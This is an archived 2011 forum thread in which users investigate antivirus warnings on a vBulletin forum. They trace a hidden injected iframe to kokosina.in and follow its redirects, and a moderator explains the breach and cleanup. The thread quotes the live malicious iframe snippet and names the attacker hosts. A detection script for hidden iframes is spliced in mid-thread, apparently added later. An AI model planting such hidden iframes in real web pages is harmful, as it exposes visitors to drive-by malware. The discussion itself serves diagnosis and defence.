View Full Version : RPS Forums Site Contains Malicious Ware?



squirrel
20-12-2011, 12:51 PM
I am using avast! and here is the warning by it whenever I turn to a new page within the forum:

Infection Details

URL: http://kokosina.in/1
Process: file://C:\Program Files (x86)\Mozilla Fi...
Infection: al
I suspect it's the advertisement that has problem as the background advertisement is currently blocked by my machine.

It's so creepy zako!

thegooseking
20-12-2011, 12:53 PM
I posted about this in forum feedback. It's affecting a lot of vBulletin sites and there's a thread about it here (https://www.vbulletin.com/forum/showthread.php/392637-Kokosina-in-Anyone-Else-Getting-This).

lhzr
20-12-2011, 02:07 PM
Yeah, I get this too.

Should we consider our passwords stolen? What does this kokosina thing do?

Vexing Vision
20-12-2011, 02:27 PM
Same, but I get the error message also for the main page, where background ads are running fine.

Kaira-
20-12-2011, 05:34 PM
Not sure if it's always been there, but I noticed that the browser attempts to connect to 212.224.112.13, and the whois for that looks like this:


inetnum: 212.224.112.0 - 212.224.112.255
netname: DE-FORNEX
descr: www.fornex.com, Fornex Hosting S.L
country: DE
admin-c: COLO-RIPE
tech-c: COLO-RIPE
remarks: -------------------------------------------------------
remarks: --- please report spam/abuse to abuse@first-colo.de ---
remarks: ---- reports to other addresses won't be processed ----
remarks: -------------------------------------------------------
status: ASSIGNED PA
mnt-by: MNT-FIRSTCOLO
source: RIPE # Filtered

role: First Colo Ripe Coordination
address: First Colo GmbH
address: Kastelburgstr. 74c
address: D-81245 Muenchen
address: Germany
phone: +49-(0)800-25557777
fax-no: +49-(0)800-25557770
abuse-mailbox: abuse@first-colo.de
remarks:
remarks: * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
remarks: * Complaints about Internet Abuse like SPAM, Hack Attacks, Scans, etc. *
remarks: * please mail to: --> abuse [@] first-colo [.] net <-- *
remarks: * Requests from law enforcement (only!), send fax to: +49 800 25557770 *
remarks: * Inquiries can only be processed, if sent to the correct address. *
remarks: * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
remarks:
admin-c: MAVE-RIPE
tech-c: MAVE-RIPE
nic-hdl: COLO-RIPE
mnt-by: MNT-FIRSTCOLO
source: RIPE # Filtered

% Information related to '212.224.64.0/18AS44066'

route: 212.224.64.0/18
descr: First Colo via AS44066
origin: AS44066
mnt-by: MNT-FIRSTCOLO
source: RIPE # Filtered

% Information related to '212.224.112.0/20AS44066'

route: 212.224.112.0/20
descr: First Colo via AS44066
origin: AS44066
mnt-by: MNT-FIRSTCOLO
source: RIPE # Filtered

Miker
20-12-2011, 06:08 PM
Same here, I had to put RPS in my exceptions just to get here.

Duckee
20-12-2011, 06:51 PM
It is also flagged by Opera as a malware threat.

Megagun
20-12-2011, 09:30 PM
WARNING: do NOT visit any of the links I'm about to post unless you know what you're doing, you think you know what you're doing, or you don't care what happens to your PC either way. That said, some of these links I'm about to post should be safe, and I'll mark them as such.

Yep, there's definitely something wrong here. This is what I found inside the source of this page:

<div style="display:none;"><iframe src="http://kokosina.in/t/go.php?sid=5" width="38" height="67" border="0" frameborder="0"></iframe></div>

Awesome, an iFrame!
Wgetting the kokosina.in URL gives me a 302 redirect to
http://212.224.112.13/nicto141211/c057cc4c4388afa8baf248cbaecfa8e7/spl.php
Following that, we get another 302 redirect to
http://212.224.112.13/nicto141211/c057cc4c4388afa8baf248cbaecfa8e7/0.php
Which in turn redirects to http://www.google.com/robots.txt for some reason, which is rather odd... Why would they redirect me to google's robots.txt?

EDIT: the iFrame is injected by the following bit of javascript code:
http://pastebin.com/XsmMHBza (this should be safe to visit if you want to look at some JavaScript, but don't be alarmed if your virus scanner thinks this is a virus, too. Some do that).

I've seen that kind of thing before. Nasty decoding/evalling stuff. This bit of javascript is hosted at

http://kokosina.in/1

Virustotal's output for that little bit of Javascript (http://www.virustotal.com/file-scan/report.html?id=7830a483024aa0a4531062248b41ac559908d54d34c198ea1116b9fdbd649b39-1324401100) (this is a safe link). Oddly enough, it's not detected by many virus scanners, but I bet that they do detect whatever the output of that bit of Javascript is (the actual iFrame injection).

EDIT: Checked the link posted by thegooseking, which says the following:

You're using vBulletin 4.1.3. There are several exploits in that version that were fixed in subsequent versions and security patches. You should upgrade to vBulletin 4.1.9. You also need to make sure your addons are up to date so that they don't have potential exploits in them.
The RPS forums are running 4.1.3. There are known exploits for that version. The forum software should be updated. Someone used a known exploit to inject some code (probably automatically), which means they probably have (had?) access to the server, which may mean that they know your password, depending on what they modified. Be vigilant, but changing your password now may be a bit silly until the forum software has been patched to deal with this intrusion. That said, I know that vBulletin by default uses some proper salting techniques, so you might be somewhat safe (again, depending on which files were modified, and in what way they were modified).
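The hidden iframe Megagun found is a recognisable pattern: an `<iframe>` wrapped in a `display:none` container, or given dimensions far too small to be a real embed. As an added example (not code from the thread or from RPS), the scanner below walks a page's HTML with the standard-library parser and reports iframes that are hidden by an ancestor's style, hidden by their own style, or smaller than a constructed 100x100 px threshold. The sample page is constructed here and only reuses the injected snippet quoted above; the benign `https://video.example/embed/1` iframe is a placeholder.

```python
"""Flag hidden or tiny iframes in HTML, the injection pattern discussed in the thread."""
from html.parser import HTMLParser

# Constructed threshold: an iframe smaller than this in both dimensions is rarely legitimate.
TINY_PX = 100


def _hidden_style(attrs):
    """True when the element's inline style hides it."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def _px(value):
    """Parse a width/height attribute such as '38' or '560px'; None if absent or unparseable."""
    try:
        return int(str(value).strip().rstrip("px"))
    except (TypeError, ValueError):
        return None


class HiddenIframeScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self._stack = []    # (tag, hidden) for every currently open element
        self.findings = []  # {"src": ..., "reasons": [...]} per suspicious iframe

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        hidden = _hidden_style(a)
        if tag == "iframe":
            self._check_iframe(a, hidden)  # checked before pushing, so ancestors exclude itself
        self._stack.append((tag, hidden))

    def handle_startendtag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            self._check_iframe(a, _hidden_style(a))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerates unclosed void elements like <br>.
        for i in range(len(self._stack) - 1, -1, -1):
            if self._stack[i][0] == tag:
                del self._stack[i:]
                break

    def _check_iframe(self, a, hidden):
        reasons = []
        if any(h for _, h in self._stack):
            reasons.append("inside display:none/visibility:hidden ancestor")
        if hidden:
            reasons.append("iframe itself hidden by style")
        w, h = _px(a.get("width")), _px(a.get("height"))
        if w is not None and h is not None and w < TINY_PX and h < TINY_PX:
            reasons.append(f"tiny dimensions {w}x{h}")
        if reasons:
            self.findings.append({"src": a.get("src", ""), "reasons": reasons})


def scan_html(html):
    """Return the list of suspicious iframes found in the given HTML text."""
    parser = HiddenIframeScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: one ordinary embed plus the injected snippet quoted in the thread.
SAMPLE_PAGE = """<html><body>
<p>Forum content</p>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
<div style="display:none;"><iframe src="http://kokosina.in/t/go.php?sid=5" width="38" height="67" border="0" frameborder="0"></iframe></div>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE):
        print(finding["src"], "->", "; ".join(finding["reasons"]))
```

Run it against a saved copy of a page (`scan_html(open("page.html").read())`); an injected frame like the one above shows up with two reasons (hidden ancestor and tiny dimensions), while the full-size visible embed is not reported. The heuristics deliberately stay simple so a false positive is cheap to review by hand.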

Ice-Fyre
22-12-2011, 11:54 AM
Sooo is the site safe now or not...

Kodeen
22-12-2011, 11:57 AM
Sooo is the site safe now or not...

They upgraded the forum version, I'm assuming in response to this thread, so ... maybe?

Jams O'Donnell
22-12-2011, 12:09 PM
Yes, the malware has been eliminated.

Megagun
22-12-2011, 04:20 PM
Regardless, change your password and remember to change it on other websites where you used the same password. If someone was able to inject an iFrame, they were able to inject other nasty stuff.

As far as I was able to detect, the nasty bits we talked about in this thread have been cleaned up and fixed. Not sure if there's more nastiness somewhere else, but at least this particular case of nastiness has been dealt with.

Wooly Wugga Wugga
22-12-2011, 05:01 PM
Would be nice if RPS could post a quick bit on the front page that they've been compromised and that people should consider taking protective measures.

Smashbox
22-12-2011, 05:21 PM
Or at least a thread...

Megagun
26-12-2011, 12:04 AM
*tumbleweed*

DigitalSignalX
26-12-2011, 12:43 AM
Didn't the upgrade to 4.1.9 fix it?

Megagun
26-12-2011, 11:43 PM
Yes, it may have (it depends on what the breach was and if anything other than the forum software was affected), but no-one who has an account here and happens to read the "Rock, Paper Shotgun Discussion" forum would know about what happened, and nowhere was anything clarified with regards to what happened and how severe the breach was.

Right now, we have to assume that all passwords and user accounts/e-mail addresses were stolen, until we hear some official words regarding these matters (and proper investigation has been done). This also means that not sending a mass-email out to anyone who has an account here is a huge oversight.

kirrus
11-01-2012, 02:50 PM
I've been meaning to post for a while, sorry, didn't quite get round to it.

The forums were breached by an injection vulnerability in vBulletin. It was an automated breach - very, very little human involvement. It didn't go beyond the forums - the main site was unaffected (hence it staying online when we took the forums offline). As far as we can determine, they didn't steal any data, and only injected nefarious code into the site. It was cleaned out after we took the forums down - we took a copy of the code, reloaded the forum files from backups, updated the forums and brought them back online.

As to password security, they are stored salted and encrypted. As with any security matter, using the same password on multiple sites, as tempting as it is, is a bad idea, and we recommend against you doing that.

The reason an email didn't go out, was due to the lack of data theft - be assured, we would ask the RPS team to let you know if we did have evidence of emails/passwords/usernames being downloaded.

richmondster
08-06-2014, 06:29 AM
Oh man, I hope I don't get that malware. Aww. (My comp is sensitive.)

QuantaCat
08-06-2014, 08:44 PM
last warning, stop posting on threads just to get your post count up. This is a thread that stopped being useful two years ago.